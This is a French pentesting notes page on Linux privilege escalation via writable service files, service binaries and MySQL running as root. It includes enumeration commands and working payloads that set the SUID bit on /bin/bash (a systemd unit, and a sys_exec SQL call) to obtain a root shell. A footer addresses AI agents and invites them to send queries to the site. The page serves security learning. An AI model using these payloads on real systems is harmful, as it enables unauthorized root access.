> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/privesc/services.md).

# Services et systemd

Des configurations de service incorrectes deviennent des chemins d’escalade de privilèges lorsqu’un utilisateur aux privilèges faibles peut modifier un fichier de service, remplacer un binaire de service, contrôler les arguments du service ou écrire dans un répertoire utilisé par un démon s’exécutant en tant que root.

## Méthodologie

* Identifiez les services exécutés en tant que root.
* Vérifiez les fichiers d’unité, `ExecStart` les binaires, les fichiers d’environnement et les répertoires de travail.
* Recherchez des fichiers de service inscriptibles ou des binaires inscriptibles utilisés par les services activés.
* Vérifiez si vous pouvez redémarrer le service, le déclencher indirectement ou attendre un redémarrage/minuterie.

## Vérifications rapides

```bash
ps aux
ss -tulpen 2>/dev/null
netstat -tuln 2>/dev/null
service --status-all 2>/dev/null
systemctl list-unit-files --type=service
systemctl list-units --type=service
service service_name status 2>/dev/null
```

## Fichiers de service inscriptibles

```bash
find / -writable -name "*.service" 2>/dev/null
find / -writable -path "/etc/systemd/system/*" 2>/dev/null
find /etc/systemd -writable 2>/dev/null
find /lib/systemd/system -writable 2>/dev/null
find /usr/lib/systemd/system -writable 2>/dev/null
```

## Binaires de service inscriptibles

Cette boucle vérifie les services activés et met en évidence `ExecStart` les chemins qui ne semblent pas appartenir à root. Considérez la sortie comme un triage, puis validez manuellement.

```bash
for SRV in $(systemctl list-unit-files --type=service | awk '/enabled/ {print $1}'); do
  EXEC=$(systemctl show -p ExecStart "$SRV" | cut -d '=' -f 2 | awk '{print $1}')
  [ -n "$EXEC" ] && ls -la "$EXEC" 2>/dev/null | grep -v ' root root '
done
```

## Idées d’exploitation

| Condition                                                     | Chemin d’exploitation                                                                                                   |
| ------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------- |
| Inscriptible `ExecStart` binaire                              | Remplacez le binaire par une charge utile, puis redémarrez ou attendez l’exécution du service.                          |
| Fichier d’unité inscriptible                                  | Modifiez `ExecStart` pour exécuter une commande contrôlée.                                                              |
| Fichier d’environnement inscriptible                          | Injectez des options ou des chemins consommés par le service.                                                           |
| Répertoire de travail inscriptible                            | Abusez des chemins relatifs, des plugins, des journaux, des sockets ou des fichiers temporaires.                        |
| Le service s’exécute en tant que root et analyse des fichiers | Recherchez des bugs d’analyse, des injections de commandes, des inclusions non sûres et une configuration inscriptible. |

Exemple de charge utile d’unité pour un laboratoire :

```ini
[Service]
Type=oneshot
ExecStart=/bin/bash -c 'chmod +s /bin/bash'
```

Rechargez et démarrez uniquement si vous avez l’autorisation ou un chemin de test autorisé confirmé :

```bash
systemctl daemon-reload
systemctl start vulnerable.service
/bin/bash -p
```

## MySQL exécuté en tant que root

Si MySQL ou MariaDB s’exécute en tant que root et que l’exécution dangereuse de UDF/fonctions est disponible, cela peut devenir un chemin direct vers root.

```bash
ps aux | grep -i mysql
mysql -u root -p
```

Dans MySQL, selon les plugins/fonctions disponibles :

```sql
SELECT sys_exec('chmod +s /bin/bash');
```

Puis :

```bash
/bin/bash -p
```

Cela dépend fortement de l’environnement. Confirmez l’utilisateur du démon, la disponibilité des plugins et les privilèges exacts de la base de données avant de vous y fier.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/privesc/services.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
